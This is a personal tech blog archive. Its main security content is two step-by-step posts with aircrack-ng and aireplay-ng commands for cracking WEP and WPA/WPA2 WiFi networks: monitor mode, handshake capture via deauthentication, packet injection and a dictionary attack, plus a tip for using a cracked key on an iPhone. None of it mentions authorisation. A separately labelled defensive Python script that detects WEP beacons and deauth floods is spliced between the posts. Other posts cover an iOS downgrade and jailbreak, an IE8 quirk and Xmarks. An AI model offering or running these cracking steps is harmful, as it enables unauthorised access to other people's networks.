Monday, February 20, 2012
iPhone and cracked hex WEP key
If you are an iPhone user and you have just cracked a WEP WiFi using aircrack-ng, you can get stuck when you try to connect your phone to that access point, because the iPhone seems unable to accept the key in HEX format.
Don't waste time trying to convert the HEX key into ASCII: it is not going to work, since you can't convert that key back to the ASCII password the access point used to generate it.
If aircrack-ng told you the access point key is something like 12:34:56:78:90, then input it as 0x1234567890 on your iPhone to get around this problem.
How to crack a WiFi (WEP)
In a previous post I explained how to crack a WPA or WPA2 WiFi using a dictionary attack.
When it comes to WEP networks you don't need a dictionary, just patience or a card with packet injection capability.
Notice that the first 3 steps in the process are exactly the same:
1 - set your wireless adapter to monitor mode using airmon-ng:
> airmon-ng stop wlan0
> airmon-ng start wlan0
2 - use airodump-ng to get a list of all available WiFi signals:
> airodump-ng wlan0
3 - take note of the information dumped on the screen for the access point you want to crack then start collecting information using airodump-ng:
> airodump-ng -c wifi-channel -w output-files-prefix --output-format pcap --bssid wifi-bssid wlan0
4 - use packet injection to generate a high number of IVs (this step is optional: it speeds up the cracking process, but you need a network card capable of packet injection and proper drivers; refer to the aircrack-ng wiki for more information):
> aireplay-ng -1 0 -e wifi-name -a wifi-ap-bssid -h your-wifi-mac-address wlan0
5 - once you have enough IV packets you can start the attack using aircrack-ng:
> aircrack-ng output-file-prefix*.cap -K -b wifi-ap-bssid
The key question here is how many packets are enough for the crack to succeed: it seems that 250,000 IVs are enough to guarantee success on a 64-bit WEP key, while 1,500,000 are needed for a 128-bit key. Remember that we are talking about IV packets here: not all captured packets carry IVs, and they arrive much less frequently if you are not executing step 4, so in that case multiply those numbers by a factor of 4 (at least).
The best way to proceed is to run steps 3, 4 (if possible) and 5 in three different terminal windows, so that you can keep capturing (and possibly injecting) while cracking: given enough time the process is guaranteed to succeed, which is why WEP is considered insecure and obsolete!
Thursday, January 26, 2012
How to crack a WiFi (WPA or WPA2)
Using a Linux box (booting from a USB pen drive if you are a Windows guy), it's quite easy to crack a WiFi using aircrack-ng. Here are the step-by-step instructions:
1 - set your wireless adapter to monitor mode using airmon-ng:
> airmon-ng stop wlan0
> airmon-ng start wlan0
2 - use airodump-ng to get a list of all available WiFi signals:
> airodump-ng wlan0
3 - take note of the information dumped on the screen for the access point you want to crack then start collecting information using airodump-ng:
> airodump-ng -c wifi-channel -w output-files-prefix --output-format pcap --bssid wifi-bssid wlan0
4 - force an existing client to re-execute a valid handshake using aireplay-ng:
> aireplay-ng -0 5 -a wifi-ap-bssid -c wifi-client-bssid wlan0
5 - execute a dictionary based attack on the handshake packet captured using aircrack-ng:
> aircrack-ng output-file-prefix*.cap -w dictionary-file
If the crack is successful you will be able to see the valid wifi password on the screen!
If you need a dictionary please refer to this page; the 18-in-1 WPA edition looks pretty good!
If you need more in-depth information then have a look at the aircrack-ng wiki, it's full of useful information but not as simple as this guide.
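The two WiFi posts above describe what an attacker captures (beacons, IVs, the WPA handshake) and the deauthentication burst that step 4 of the WPA guide sends. From the defending side, the same frames are what you would look at to find access points still running WEP and to notice a deauth flood. The script below is an added example, not code from the original blog or from the aircrack-ng project: it parses raw 802.11 management frames (24-byte MAC header, radiotap header assumed already stripped), classifies each beacon as open/WEP/WPA/WPA2 from the Privacy capability bit and the RSN and WPA information elements, and counts deauthentication frames per BSSID. The frames at the bottom are constructed by hand for the demo and the alert threshold of 10 deauths is an arbitrary assumption.

```python
"""Audit 802.11 management frames: flag access points still advertising WEP
and detect deauthentication floods like the one aireplay-ng -0 produces.

Added example (not from the original posts). The frames at the bottom are
constructed by hand; in practice you would feed raw 802.11 frames read from
a monitor-mode capture, with any radiotap header already stripped."""
import struct
from collections import Counter

TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12
CAP_PRIVACY = 0x0010                  # capability bit: encryption in use
IE_SSID = 0
IE_RSN = 48                           # RSN element: WPA2 (or newer)
IE_VENDOR = 221
WPA1_OUI_TYPE = b"\x00\x50\xf2\x01"   # Microsoft OUI, type 1: WPA (pre-RSN)


def mac(raw):
    """Format 6 raw bytes as a colon-separated MAC string."""
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame):
    """Split the 24-byte MAC header into (type, subtype, addr1, addr2, addr3)."""
    fc = frame[0]                                  # frame control, first octet
    return (fc >> 2) & 0x3, fc >> 4, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])


def beacon_security(frame):
    """Classify a beacon as 'open', 'wep', 'wpa' or 'wpa2' from its
    capability field and information elements."""
    body = frame[24:]                              # timestamp(8) interval(2) capability(2) IEs
    (cap,) = struct.unpack_from("<H", body, 10)
    if not cap & CAP_PRIVACY:
        return "open"
    pos, wpa1 = 12, False
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if tag == IE_RSN:
            return "wpa2"
        if tag == IE_VENDOR and value[:4] == WPA1_OUI_TYPE:
            wpa1 = True
        pos += 2 + length
    # Privacy bit set but neither RSN nor WPA element: only WEP is left.
    return "wpa" if wpa1 else "wep"


def audit(frames, deauth_threshold=10):
    """Return (security per BSSID, deauth count per BSSID, BSSIDs over threshold)."""
    aps, deauths = {}, Counter()
    for frame in frames:
        ftype, subtype, _, _, bssid = parse_header(frame)
        if ftype != TYPE_MGMT:
            continue
        if subtype == SUBTYPE_BEACON:
            aps[bssid] = beacon_security(frame)
        elif subtype == SUBTYPE_DEAUTH:
            deauths[bssid] += 1                    # addr3 is the BSSID in both directions
    alerts = sorted(b for b, n in deauths.items() if n >= deauth_threshold)
    return aps, dict(deauths), alerts


# --- constructed sample capture (hypothetical addresses) -------------------
def mgmt_header(subtype, dst, src, bssid):
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0])
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00"   # duration, addrs, seq


def beacon(bssid, ssid, cap, ies=b""):
    body = b"\x00" * 8 + struct.pack("<HH", 100, cap) + bytes([IE_SSID, len(ssid)]) + ssid + ies
    return mgmt_header(SUBTYPE_BEACON, b"\xff" * 6, bssid, bssid) + body


def deauth(dst, src, bssid, reason=7):
    return mgmt_header(SUBTYPE_DEAUTH, dst, src, bssid) + struct.pack("<H", reason)


AP_WEP, AP_WPA = b"\x00\x11\x22\x33\x44\x55", b"\x00\x11\x22\x33\x44\x66"
AP_WPA2, AP_OPEN = b"\x00\x11\x22\x33\x44\x77", b"\x00\x11\x22\x33\x44\x88"
CLIENT = b"\xaa\xbb\xcc\xdd\xee\xff"
RSN_IE = bytes([IE_RSN, 2]) + struct.pack("<H", 1)                 # minimal RSN, version 1
WPA_IE = bytes([IE_VENDOR, 6]) + WPA1_OUI_TYPE + struct.pack("<H", 1)

SAMPLE_FRAMES = [
    beacon(AP_WEP, b"legacy", 0x0001 | CAP_PRIVACY),            # privacy bit, no RSN/WPA: WEP
    beacon(AP_WPA, b"old-wpa", 0x0001 | CAP_PRIVACY, WPA_IE),
    beacon(AP_WPA2, b"home", 0x0001 | CAP_PRIVACY, RSN_IE),
    beacon(AP_OPEN, b"guest", 0x0001),
] + [deauth(CLIENT, AP_WPA2, AP_WPA2) for _ in range(12)]         # a deauth burst at one AP

if __name__ == "__main__":
    aps, counts, alerts = audit(SAMPLE_FRAMES)
    for bssid, sec in aps.items():
        print(f"{bssid}  {sec:5}  deauths={counts.get(bssid, 0)}")
    print("deauth flood suspected at:", alerts)
```

Two details matter for a real capture: a beacon whose Privacy bit is set but that carries neither an RSN nor a WPA vendor element is the signature of WEP, which is exactly the kind of network the posts show falling to a pure IV-collection attack, and deauthentication frames are counted by addr3 so that a burst spoofed as coming from the AP and one spoofed as coming from the client land on the same BSSID.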
Saturday, July 23, 2011
Upgrading iOS to 4.3.3 when latest is 4.3.4
Finding precise instructions on how to perform this procedure was not easy, so here is what I consider a step-by-step sequence to follow to upgrade your iDevice (an iPhone 4 in my case) to a firmware version which is not the latest one.
Be aware: you need to have your SHSH already saved for the firmware version you want to update to, otherwise you can't proceed!
- Download latest redsn0w
- Download the firmware version you want to use
- Download TinyUmbrella and RecoveryFix (you may need zlib as well)
- Backup your iDevice using iTunes
- Start TinyUmbrella, download all the available SHSH and start the TSS server
- Start iTunes
- Put your iDevice in DFU mode
- From iTunes select Restore Device while holding the shift key, then select the firmware you have downloaded and wait until the procedure ends with an error (1011, 1013 or 1015, which is normal)
- Now you are stuck in Recovery Mode; this is where the RecoveryFix tool comes in: start it and wait for the procedure to complete. You'll end up with a phone unable to do anything other than emergency calls, don't panic
- Run redsn0w, load the same firmware you used to upgrade and let the procedure run: you'll end up with a jailbroken device, but still unable to connect to your mobile line
- Run iTunes and restore your backup; it can take a long time and may require some free space on disk
- Your iDevice is now upgraded, restored and jailbroken... enjoy :-)
Friday, July 8, 2011
IE 8 and CSS: localhost vs rest of the world
Ok, I have to admit it, I'm not a big fan of Microsoft, but this time they really drove me nuts!
One of the most common answers a software developer gives when faced with a defect is "it works on my machine", and we all know this is not really true, as usually the answer should be "I didn't test this scenario". But this time that is not the case.
Yesterday I was trying to fix a layout problem in an HTML popup and I thought I had it sorted. I then pushed the change into the team repository and the CI system built and deployed it, but when the tester gave it a try.... it wasn't sorted. After 6 hours of research this is what I came to: Internet Explorer 8 switches between IE8 mode and IE7 mode depending on whether you are accessing the resource as localhost or with another name/address!
Let me make it a little clearer. Write a simple HTML page (the content does not really matter) and put it on any web server you like. I was using JBoss, but it doesn't really matter; the only thing you need is the ability to access the page both as localhost and via your IP address (which means you have to start JBoss with -b 0.0.0.0).
Now open IE8 and access that page using localhost. When it is loaded, press F12 to open the Developer Tools and look at the last element in the menu bar; it should be like in the following picture:

Close both windows and repeat the same process using your IP address in the URL; the result should be the following:
This is magic! It took me 6 hours to figure out what the problem was! And if you are trying to lay out stuff in a DIV using CSS, this small Document Mode change can make a huge difference in what is rendered on the screen!
So imagine you, as a developer, see your code working as you expect, you push your changes and suddenly the page appears wrong, again, and again, and again.... All the files are exactly the same, on your machine and on the server you are checking against.... but what you see is different!
Thank you again Microsoft, now we can really trust our work. When it comes to IE8, the What You See Is What You Get paradigm is completely fulfilled!
Tuesday, November 2, 2010
Xmarks lives!
A few days ago I posted an article about a software company and a browser plugin that were going to die due to lack of funds... I'm now happy to announce they have solved their money problems and their service is going to stay with us. Happy rebirthday to Xmarks!
- Posted from my iPhone
Monday, October 4, 2010
Xmarks is going to die
In the past few days I received an email which changed my mood: a tool I was very happy to have installed on all my browsers and on all my IT gadgets is going to die.
Xmarks is a very useful tool, a browser plugin which is able to sync your bookmarks and credentials across many different browsers, solving my password and bookmarks problem once and for all.
Sadly its inventors were not able to build a revenue-generating business on such a tool, and they seem to be forced to shut the service down.
All my appreciation for your work, guys, and all my sadness for not being able to use it any more.